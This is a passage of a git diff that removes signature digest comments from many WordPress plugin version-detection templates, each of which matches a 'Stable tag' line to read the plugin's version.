+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022065b1c55878613adf197c5a38cf9b597d79772bf2104f7fd880b9e7936f7550c4022100d54fa1368a9e4e9b866c5c8678751276d5da54aea6c945ab1b7425b77195030c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 892bfc000f..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b55e6d1474214dbb20a01e03e8c2b630fe4d695f2dc6217285d12070435abd880221009ed15676978233220d0f1a3d6a901e59e93724c908b2e9f99e61cd06f5633f3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ae32a9381e..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c2ef628d5799ba58f5b4136997ec76036fd475b749dc8157acbd78b485ac6f1a02203b31c3e5f61b3178c0038d872f7fe1f7182888d6fa24348788eb5fad0b393e4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 374d40fc5c..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220593700f048e2c5c555376dd0d0b45fb65af1bc83e7d73c1cdf06d18160b6c4a8022100a4b864b2afa65795778d2cb691a604021e9591da3ea93661948b95f2174c3a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index e54636bd7b..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220695952febe98d582c38653e33c55224f18920be1d4b4a6e5626f0fff50391bef022100c2ec3cec8cb03f57d8f43d3134f89c9a923ef494a8818dfd2d0bf4cf386fa452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index f17c1ef5a5..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220323191fccac58868863110536a70e27ccb350588562e5d7bd268f5c71be273c4022070db54dc112a37d1539ec6d1d4a4d0eb7ffe6d151df2c2dbb95575102991bd16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 84e2980c68..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210098361ca34976142aaf8b0f54388aab772ccc7d04e60d6d0b50b84d60bb881b02022100b703a3a6e8a2320e3e12c335b078b6f03b2dc8ac96718967a40c31ad597df343:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 4a8f1955e7..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ee2cf16ea298c895527a109cb5fcb2c70f003c6b1a623f91daedc7781cced0c00221009c5a1b3bea6ebe0135f134c8ea4e67bf9711fde52f242aea7124f9837fd94cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index b082597e93..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220215e524ec2953b765de444dd1682a9f18de02fb7b1ae1bac3da8497e040d0b120221008a33839c470a19df4602ddcbf3a1369914f0dcb306bfb72ea59902348ae095fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index d280621d0b..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068f73edc75a4e4e93642a7b276813f6ff2352a0ae14068ad9176a7168c7b2bd2022100b177ac7de47a2d3e2ac7999ec8e595f41200b5c4b3d2e90cd28ca3330bbaa637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index d18be4e112..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f2f672457083e7d550104c4d5a0c282cf9a738c6f51ce2b6627d61a7b811b88022100f77dc7eb32cb5cc0fe39a6f3d65192a4b15bd9f8d507a7781056cde38de60c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 6713442606..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068517daf008e1173f851d9014e821ac0b2c2468025fe7037d00bf90c336023b1022100b5873588637e2426d3518e6a5902d925d843f2e76425180b1a30497e4c387a1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index dba4615ebc..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220380b536dda0900bd3c274c1e8734baedd6cffa7bf7904a05fde1cb117865e96f0220662f6b5ebb66cef364613ef07576b20a2eb8b9e9896499ec6b4ebbb8fdeddf16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 469214b058..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200cdcad43ecb2dff07822a370e05758d47a780ac3733b7c68242e6ec6c66aad9f022100a11935aa9bf35edc690fa3a4edfa9179b52beadf38288ffd52ddc270a6dfe745:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366a806546..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201450122a9c20434754ce5715feac4686244ee5597a3015b16f8e58c3c66e8b9502202e83dfd96bf93988e99b555a42fae337cdef925bbbfadfaf44d500b6ca90fe0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 6f31d89ca6..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cb2d48c2af556d0ab26c233467bab62ed8b74b258c36aceaa95c58dd0373edc502201e9c7b3c019b9d91b808289cef1664e5a1d66465d3f56a3e89ad3c3d6520a7b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 33ba5a4ed4..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b1a536798cb78955a9f0e97843e3ba734ec677e9b6f69a630f75ab6e1f99adad022034ba095e280379c9980e4b11568c2ea933192106ea3e1511e5059bc79ec66e74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 79872a1fb7..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009b1a98ea1169118f5166af7ad45f4181fc45742f07eb9ddc793088884fa896610221008acdefc76eb8dcf5bbff7f69de820c17f0e16725b51dcd46ff5e8c752bd85486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 7110235ae7..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210088fc98d609d5c6ebc3d092a1dfe80a95dd3b60ea4077cce208ee1358f87e747402200b8f44062b2461c8f75d045f9e3144dff516cf2c54a45abc9e647d4bcc323c5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index b00325eaba..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae4524c2faad1464526f663041a12c12600331b6f9d8f8a4cfd085d99ebc03c40221009b0882fe8e351fb28784280da89e8cc806d6daae92920665e30f23755771bd28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 9e0f3b9360..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e4b65cdb91ba9b9ef00b6bb2b19fe835dde90964171b0daf0541e478adac2c1022007796ca3bd49f0c586db9cde02f0fa5ebeb61d3ba74dadb7bc9c060763b0f42a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index d164794e19..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220389133d5dfa340f5705298a5c572c5cb6fd0d7d1f4935b65baa5a8599f50bad502207aa167ba5999169b12eb61061bcdbee70f1e98cce2f55015be270c8d9100dc37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index a9b7eeff0f..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022021002403ebcb05e8fe09ff4246a19eedb208c5ae66c98f4cd4b021afa3e49965022050e906b0f19a8fe2b91b9f045512c51ca1fabab9b14403dfa5f77f54bf61d54a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index cf7baeeff6..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8d277c62dab9df59f49ed2b658a56ad9fd78c146ae3dcd8e1e807c76be2a4a2022100fc2936b93fc8a973c04fd1e20c503db638ba5e2a685bdc4fb813dc01ebf22441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index b51dfe740d..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ef8ceaa7e9e8f9f627cdcebc8e1e6b9a3f4a90b3e996c04a5c75ad9a3db8783a022100e782105afd6b9eb5cc35a4bf0a193b0c82d11f6a822a0f2c4ecfc57c507e6a3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 82222048fd..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d7b5ebb38120eb8d4a7b44a40d8e368c70d7c5db26c806116a60fa5566a4969802210082807149d4a5f166d48764372d601e9cba22b1be39ec340191a4f7a9b7f7eae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index b75c5861c9..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220173a20b2df30ce4e3e581047fa8a1b1b750b5e0c7baea9530f8aeea838634d2e022100f1617d240bc246d67aaf0bba84aa4948d5ba7d35363326273cef606c7f8a7676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 29bcc18d00..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201446f304900451fff7a87109ca7483135f2199a67b3809335910ada896c4c2d802207eb44bfabacf0f774f9c02f505f789183c4b83afd5cb6dae571f9a6869ddb398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 1474df9859..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3d3bf7149f5489459472af685f93f972e60c065d9d431bf064448d53d619be6022100dcde3a2f502962d471d8a6d2e7ea7ca95d6f4ef80ecab42b91db06e96cdde748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 9506e0f694..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3fe26472fba169f2cdc7804363dca0562b228141724f21c0032cf62d20305b5022100ae4993b3ee391d131ec0016857b204b43da68468b9a1538810efa34e28f4e651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 50dedc9495..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008599f0ac11c99c56be311e81e3c3b2997258bcf2584943c70c74b4fe2e2bb14f02206dde6e909a45c9d859c197ba078388c7fb129f9db6b20a7edda4c773b483c877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 9925ffd929..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210081f77f6a5b378edd2db6da75b8c5831bd22e89f799fefb0c2d5ae2cd0835ae56022054e3a302b33e6f7384d2779527038b1af0c871885489f9f72f5b4f727e2a3811:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 36cf5df19e..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202033c9fa4b50825e467cf6052fa53aff2a9696b85cf2840660ef4ab1cd6883f3022100f7427caa9c7b3e628585aaa75804b4d47ed509d7ea6486ef960e4d713ae30316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 105141b591..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206fc9b3e5a3574b3734bb73499b0e95688fffd6cf4db490fd2d12f10e393135280220436a9f9b671a187cb9159878de550589336ca1394729078f2fbea2e3519d7e05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5bbd084e12..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fb5fccb7adf2237f9edca0fddce4b681db37b3d4cbf8d48d066d057530ea2d81022026e736dfdece20c494cf55cc78e7ebf865ba42c2b0c0832a077efdc48720eab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index b41b658cfa..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008bfa4d112af1a4b036cedfb520dbaf17fe88180d4770d58ab1045af61f7191ff0220032c154afcf601df72ed0c3dfba90e6e9864c0eb642998ebb5d04714ac821f0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 57c64bb9de..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c8888d9589785224b4d64525c5b0064efd012efe3484a76abed48d0a4bd6b6802206eab42e5632c3836bc2b9d39bcbfb3ea34b8744c3504ec0eb7d214474c58b164:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index b873bd1df4..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e2f57489e3bb721b7d1ca7cfcbf79e046a08a5c329c66caeabaec6164aee7ffa02201e147a21d761050cc9efb9f967af28ab7196502b098929b704aab9df5c7561e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 07c5444aa7..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eafe593a7361439ab36ea3bf19f8d86d068c424a1c705b0ac7a17250ffa2abc1022100bf570977c046a7d66d8705c68160c8d2dd6b2000499545db33e0291dd6442d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 8fa3814502..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a025b7adfe4e6065210ec81a70291979c44a1e56cdddb3b943c24ca98d70724d0220691a5634de391db0328a3e2da127161bdc8474109f5d879de50959733b5b775a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 85966184aa..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204ff7e0f5783444b0c7728dc975a7cac85bab1bb4d4ccd5a85bc6bdb2cb4f666b022100b27f8a77c114dbafd4464e1b70a62f79129b28ed274984bb40eb6a636f10a1c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index cfd4176f81..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022038c7a1a5d6c255a44824669cd36fc9c56f96ac999e207e9d8de9a57dc037fadb0221008f44d4adfc83c1f1b2c542477fe7e2753f80033d4d569eecdac3471a966043a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 6e9725d6da..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd2866332540144fc61e6fa03c696f9b3bbfb83e51c1a25fde1dbce627e68fe402205fb382fd81b3e606b7451967e0efbe516f8d5366dc1e76630cadcc4d4526bcf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 568e1bd81a..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022022647396110bba6e37807d6c91e86d4dccac27f0050ae0197d62c5c701a9206a0220706aac4cd949ae60d69a9bed2899c3e32a6bbb4719752ace93eab55776cbd182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index a6e8ec4edb..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fc3781b47341cef4d94441aa59ea37aa81c07a8f7412026db77de263f3b0af400221009292e41b3b9642455491a4f9196c05dd00e1cf6c9251437f8b03f8e09ef8e1d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index b3684caa70..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203bb3212d141ba30030ce1db2e5f14c9df8d6cefbfb272286b9627dd24bc40f2c02202b879bb77aa48a85f29ef64648e44ffb37f466b4337bf5f34bd921504d1c32f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 70968c68f7..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220612dd1f6fa61039d99418cbca94e4fcf0c591fd5319ecb2c0c2080b6f0113c7402204b53e18be6a9a1ace7db909eeb9b9bd90d68ff17378ec95d1aeedc434a70601d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 